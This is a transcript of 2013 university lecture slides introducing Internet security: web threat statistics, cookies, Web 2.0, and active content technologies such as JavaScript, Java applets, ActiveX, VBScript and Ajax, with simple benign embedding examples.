Transcript JavaScript
CSCD 303
Essential Computer
Security
Spring 2013
Lecture 11 – Internet Security
Reading: See links end of Lecture
Overview
• Internet Security
• Threats
• Web Technology
• Web 2.0
• Active Content
– Javascript
– Java Applets
– ActiveX Controls
– VBScript
– Ajax
Internet Security
Major source of security problems is from the Internet
Going to study how the Internet works and the
technologies used that both makes the Internet popular
and unsafe at the same time
The way the Internet has evolved from storing content to
user created content has contributed to the difficulty of
keeping safe while we surf
Web Threats
Internet Threats 2009
• 23,500 new infected Web pages are discovered every day
– One every 3.6 seconds
• 15 new bogus anti-virus vendor websites discovered every
day!!
– Number has tripled, up from average of five detected per day,
during 2008
• 6,500 new spam-related websites are discovered every day
– One website every 13 seconds, 24 hours a day
– Almost double same period in 2008
http://www.sophos.com/sophos/.../sophos-security-threat-report-jul2009-na-wpus.pdf
More Internet Stats
http://community.websense.com/blogs/websensefeatures/archive/2009/09/15/websense-security-labs-report-stateof-internet-security-q1-q2-2009.aspx
• Today's threats are Web Based
– During first half of 2009 Websense Security Labs
discovered:
• 233% growth in number of malicious sites in last six
months and a 671% growth during last year
• 77% of Web sites with malicious code are legitimate sites
that have been compromised.
• 86% of all unwanted emails in circulation contained links
to spam sites and/or malicious Web sites
More Security Threats 2013
http://blog.spikes.com/blog/2013/1/11/the-top-security-threat-of2013-is-the-web-browser
Recognition among security authorities that drive-by malware
from web links is #1 threat facing networks today
Attackers are moving into targeting browser plugins such as
Java, Adobe Reader and Adobe Flash.
Drive-by download attacks are almost exclusively launched
through compromised legitimate websites which are used by
attackers to host malicious links and actual malicious code
Web Technology
• Useful to understand how Web works
– As technical people, have basic understanding of
clients/servers
– Look at details and some stats on both browsers and
Web Servers
– Which browsers would you guess are most popular
today?
Nice page of ALL Web browsers, even text based
http://www.webdevelopersnotes.com/design/browsers_list.php3
Web Browser Stats
• Monthly statistics on Web Browser market
http://www.w3schools.com/browsers/browsers_stats.asp
Ranking as of December 2012
1st - Chrome
2nd - Firefox
3rd – Internet Explorer
There are five major browsers used today
Internet Explorer, Firefox, Safari, Chrome and Opera
Web Server Stats
http://royal.pingdom.com/2011/09/16/microsoft-iis-web-server-marketshare-loss/
• Based on a survey of 205+ million sites, Netcraft reports that
Apache has a 65% share in 2011 while IIS has 16%
Web Browser Functions
• Browser interprets and displays HTML files
– Supposed to conform to specifications maintained
W3C (World Wide Web Consortium) organization
• Standards organization for web
– Current Version HTML 4, Version 5 in progress
http://www.w3.org/TR/html401/
– Current CSS Version 2, Version 3 in progress
http://www.w3.org/TR/CSS2/, version 3 in
progress
Plug-ins Enhance Browsers
• Visit web page that includes more than simple HTML
content
– Likely to need plug-in applications
• Flash Player most needed plug-in
– 75% of the animated advertisements you see online are
Flash .swf movies
• Adobe Acrobat Reader .pdf, next most needed
– Most government forms, online application forms,
multitude of other documents use .pdf format on the Web
• Movie/audio player to run .mov, .mp3, .wav, .au, and
.avi files
– Windows Media Player is .. most popular
Browser and Web Server State
• Neither Browsers or Web Servers keep
“state”
– What does this mean?
• How can browsers and Web Servers keep
state?
Browsers and Web Server State
Defined
This means user data is not persisted from one Web
page to next in a Web site
Web developers refer to practice of tracking users
as maintaining state
Series of interactions that a particular user has with
a site is a session
Browser State
• How do browsers keep state?
– Cookies!!!
• Cookies, small text files stored in your computer's browser
directory or other directory
• Cookies
– Created when you use your browser to visit a website that
uses cookies to keep track of your movements within the
site,
– Helps resume where you left off,
– Remembers registered login, theme selection, preferences,
and other customization functions
Browser Cookies
• Two types of cookies are used
• Session cookies,
– Temporary cookies remain in cookie file of your browser until
you leave the site
– These cookies only stored in memory
• Persistent cookies,
– Remain cookie file, browser for much longer
– Have an expiration date
Browser Cookies
http://en.wikipedia.org/wiki/HTTP_cookie
Each cookie has values for six fields:
* Name - Name of the cookie
* Value - ID string set by Web site
* Domain - Of Web site issuing cookie
* Path - “/” means the cookie is valid anywhere on that domain
* Expires - Cookie expires on that date
* Secure (used for cookies that require a SSL connection)
Example from my cookie stash ....
Evolution of Web Technologies
Problem
• All research shows, Internet based attacks
appear to be increasing
– Why is this?
Evolved from Web 1.0 to 2.0
Most people agree that Web 2.0 is
– Interactive and social
– Facilitating collaboration between people
This is distinct from the early web (Web 1.0) which was a
static information dump where people read websites but
rarely interacted with them.
Web 2.0
• How do you define Web 2.0?
– Web "as Platform," where software applications
built on Web as opposed to desktop
– Customers are building content
• Activities of users generating content ...
ideas, text, videos, pictures create value to
web site ...
• Nice YouTube Video of “Us as Web”
http://www.youtube.com/watch?v=NLlGopyXT_g
Web 2.0 vs. Web 1.0
Web 2.0 Technologies
Web 2.0
• Web 1.0
– Pull information
– Read information
– HTML (Web pages)
• Web 2.0
– Push information
– Read / write (cooperate and collaborate)
– XML, RSS, Mash-ups
– What's a mash-up?
Mash-up Defined
• A mashup
– Web site that combines content data from more
than one source to create a new user experience.
– "mashup" comes from pop music term, refers to
two or more songs combined into a new song
• Example
– Most common Google product used for mashups is
Google Maps
Security and Web 2.0
• Why is Web 2.0 Insecure?
– User generated content
• Do you trust your users?
• Easier to upload or infect content
– More complicated technologies behind Web 2.0
• Active content – scripts and other automatic
components
• Combined content from many sources
– Advertising often contributes vulnerabilities
Web 2.0 Increases Threat
•
Popularity of Web 2.0 sites has changed way we
communicate and use web
• Created an irresistible target for malware authors
Social-networking sites, blogs, and wikis
• Malware authors take advantage of these sites, opening up
yet another front in cat-and-mouse game between security
defenses and hackers
http://www.scmagazineus.com/
How-to-protect-against-Web-20-threats/article/34711/
Web 2.0 Nightmare
• “Every company has plans to move mission
critical applications to the Web
– Yet, companies do not have web security plan
to ensure applications free from exploits and
hackers … (accidents waiting to happen)”
CIO Magazine quote
http://cio20.com/2008/01/03/web-20-and-application-security/
– Look at the technologies that enables Web to
function
Web 3.0 is Coming
http://socialmediatoday.com/node/423732
Web 3.0 is a Marketing Term. Sadly, this is probably the
most likely way that we'll be using the term 'Web 3.0' in
the future
Within Web 3.0 social networks will be critical conduits
through which we design and stumble through our
individual contexts, veering out to increasingly social
content experiences built by big content providers like
Yahoo, AOL, newspapers, blogs and so on
Amazon and eBay have already become large media
experiences as we come to enjoy the act of browsing
as much as the act of buying
Active Content
Active Content
• Used to be Web pages consisted of HTML
– Purpose of the Internet was
• Downloading information
• Viewing pictures and other graphic images
• Filling out input forms
• Our Web site, example of what kind of content?
http://penguin.ewu.edu/cscd303/
Active Content
• What is active content?
• Web site that is either interactive
– Such as Internet polls or
– Dynamic, such as animated GIFs, stock tickers,
weather maps, moving ads
– Embedded objects, streaming video and audio
ABC
http://abc.go.com/
Active Content Languages
• Implementing Active Content
– HTML does not have built in capability to
handle active content
• Embedded video objects,
• Dancing bears
– Other languages added to Web pages within
HTML tags allow expanded capability
– What languages implement Active Content?
Active Content Languages
• Active content implemented mainly through
– Javascript
– ActiveX Controls
– Java Applets
– VBScript
– AJAX
Javascript
• What is it? Has anything to do with Java?
– JavaScript, is unrelated to Java programming
language
• Has common C syntax
• JavaScript copies many Java names and
naming conventions
– Was originally named "LiveScript"
• Renamed in a co-marketing deal between
Netscape and Sun
• Netscape bundling Sun's Java runtime in
their then-dominant browser
Javascript
JavaScript writes functions that are embedded in or
included from HTML page
Simple Examples
– Opening or popping up new window with control
over the size, position, and attributes of window
– Validation of web form input value before
submitted to server
– Changing images as mouse cursor moves over
them … catches user’s attention
– Example here
http://www.javascripter.net/faq/onmouseo.htm
Javascript
• JavaScript code runs locally in user's
browser
– Respond to user actions quickly, making an
application feel more responsive
– Example:
• Gmail is written in JavaScript
– JavaScript dispatches requests for
information such as the content of an e-mail
message
HTML code with Javascript
<html>
<head><title>simple page</title></head>
<body>
<script type="text/javascript">
document.write ('Hello World!');
</script>
<noscript>
<p>Your browser either does not support
JavaScript, or you have JavaScript turned
off.</p>
</noscript>
</body>
</html>
Java Applets
• Java Applets
– The word applet is meant to suggest a small
application
– Applets were intended to be small programs
run over the Internet
• Applets can be viewed over Internet, or
without any connection to Internet
• When you use browser to view page that
contains an applet, applet's code is
transferred to your system
• Executed by browser's Java Virtual
Machine (JVM)
Java Applets
• An applet class is compiled in same way
as any other Java class
– However, applets run differently from other
Java programs
• Normal way to run applet is to embed it in
an HTML document
– Then run and viewed through a Web browser
Java Applets
<html>
<head>
<title>
Vampire Control
</title>
</head>
...
<applet code="AppletCalculator.class" width=400 height=300>
</applet>
...
</html>
Active X
• ActiveX, set of object-oriented programming
technologies and tools from Microsoft!
• You create, in ActiveX environment, a component
–Self-sufficient program that can be run anywhere in
your ActiveX network
–Component known as an ActiveX control
–ActiveX Microsoft's answer to Java
• An ActiveX control is like Java applet
–Can be developed in several languages
•Visual Basic,
• C++
• Java
Active X
• ActiveX
• Renamed Component Object Model (COM)
developed by Microsoft for Windows,
• Changed to ActiveX in 1996
• A software application can compose one or more
components in order to provide needed functionality
Active X
• Most Microsoft Windows applications
– Internet Explorer, Microsoft Office, Microsoft Visual
Studio, Windows Media Player,
– All … Use ActiveX controls
• Encapsulate functionality as ActiveX controls
can be embedded in other applications
• Internet Explorer also allows ActiveX controls to be
embedded inside web pages
• Point for us,
• Can expand application functionality to the Web!
Example Active X Control
Active X
• ActiveX controls are like Java applets,
• Both designed to be downloaded and executed from
web browsers
• Differences
• Java applets can run on nearly any platform,
• ActiveX components can only run on
Microsoft's Internet Explorer
• ActiveX controls also granted a much higher level of
control over Windows than Java applets
• Making them both more powerful and dangerous!!!
Active X Example
•
The process of embedding ActiveX controls into a web page is very similar to the way Java
applets are embedded. The following example shows the HTML code used to embed an
ActiveX control.
•
•
•
•
•
•
•
•
•
•
•
•
•
•
<OBJECT ID="AreaMenu" WIDTH=192 HEIGHT=192
CLASSID="CLSID:275E2FE0-7486-11D0-89D6-00A0C90C9B67"
CODEBASE="http://activex.microsoft.com/controls/mcsi/mcsimenu.cab#
version=1,0,0,44">
<PARAM NAME="ForeColor" VALUE="&H00000000">
<PARAM NAME="BackColor" VALUE="&H00BEBEBE">
<PARAM NAME="FontName" VALUE="Verdana">
<PARAM NAME="FontSize" VALUE="10">
<PARAM NAME="FontBold" VALUE="0">
<PARAM NAME="FontItalic" VALUE="0">
<PARAM NAME="FontUnderline" VALUE="0">
<PARAM NAME="FontStrikethrough" VALUE="0">
<PARAM NAME="FontCharset" VALUE="0">
</OBJECT>
Active X Example
• The tag creates the ActiveX object. The tag has 5 attributes:
– ID: Object Name. You use ID to refer to the object with
JavaScript
– WIDTH: defines the width of the control on the web page
– HEIGHT: defines the height of the control on the web page
– CLASSID: Each ActiveX control assigned unique Class ID
number, like an identification number, use number to tell
computer which ActiveX control to load
– CODEBASE: If control is not present on system, Codebase
attribute tells the browser where to find the control on the
Internet. The viewer's browser will then download the file and
install it on to the user's computer
– Short article below explains Active X
http://www.cs.ualberta.ca/~zaiane/courses/cmput499/work/prese
ntations/activex.html
VBScript
• VBScript
– Visual Basic Scripting Edition
– An Active Scripting language developed by
Microsoft
– Language's syntax reflects its history as a
limited variation of Microsoft's Visual Basic
programming language
VBScript
• VBScript installed by default in every
desktop release of Microsoft Windows
since Windows 98
• Microsoft Internet Explorer
• VBScript is similar in function to JavaScript,
as a language to write functions that are
embedded in or included from HTML pages
VBScript
• Web browsers Firefox, and Opera do not
have built-in support for VBScript
• So ... developers almost always use JavaScript
for cross-browser compatibility
• Besides client-side web development,
• VBScript is used for server-side processing of
web pages, most notably with Microsoft Active
Server Pages (ASP)
VBScript Example
<html>
<body>
<script type="text/vbscript">
document.write("Hello World")
</script>
</body>
</html>
Can you see this in Firefox?
Ajax
• AJAX
– Group of web technologies
– Implements a web application that communicates
with a server in the background,
– Without interfering with the current state of the
page
• AJAX = Asynchronous JavaScript and XML
• AJAX is based on JavaScript and HTTP requests
• Not a new language but a combination of languages
already known
Ajax
Traditional Web application, interaction
between customer and server goes like this
1. Customer accesses Web application
2. Server processes request and sends data to browser
while the customer waits
3. Customer clicks on a link or interacts with the application
4. Server processes request and sends data back to the
browser while customer waits
5. etc....
• There is a lot of customer waiting!!
Ajax
• Ajax Acts as an Intermediary
• Ajax engine works within Web browser to render Web
application and handle any requests that customer might
have of Web server
• At start of session, browser loads an Ajax Engine — written
in JavaScript and usually tucked away in a hidden frame
– Engine is responsible for both rendering interface user
sees and communicating with server on user’s behalf
Ajax vs Traditional Web Browser
Ajax
• With Ajax,
– JavaScript loaded when page loads handles most of
basic tasks
– Data validation and manipulation,
– Plus displays changes ... without a trip to server!!
• Same time that it makes display changes for customer,
sends data back and forth to server
– Data transfer is not dependent upon actions of
customer
– Google maps,
– Google suggest,
– Flicr
use Ajax
• http://adaptivepath.com/ideas/essays/archives/000385.php
Summary
•
•
•
•
•
•
Begun to look at Internet and Web security
Web 2.0 is a problem
Active Content is today’s Internet
People want functionality
Security seems to be secondary
So, what else is new?
References
• Nice Overview of Browser/Web Workings
http://taligarsiel.com/Projects/howbrowserswork1.htm
• Wikipedia Browser Comparison Page
http://en.wikipedia.org/wiki/Comparison_of_web_browsers
• Browser Cookies
http://www.timeatlas.com/term_to_learn/general/browser_cookie_ba
sics
http://www.morevisibility.com/analyticsblog/from-__utma-to-__utmzgoogle-analytics-cookies.html
• Web 2.0
http://en.wikipedia.org/wiki/Web_2
The End
• Next Time more Internet Security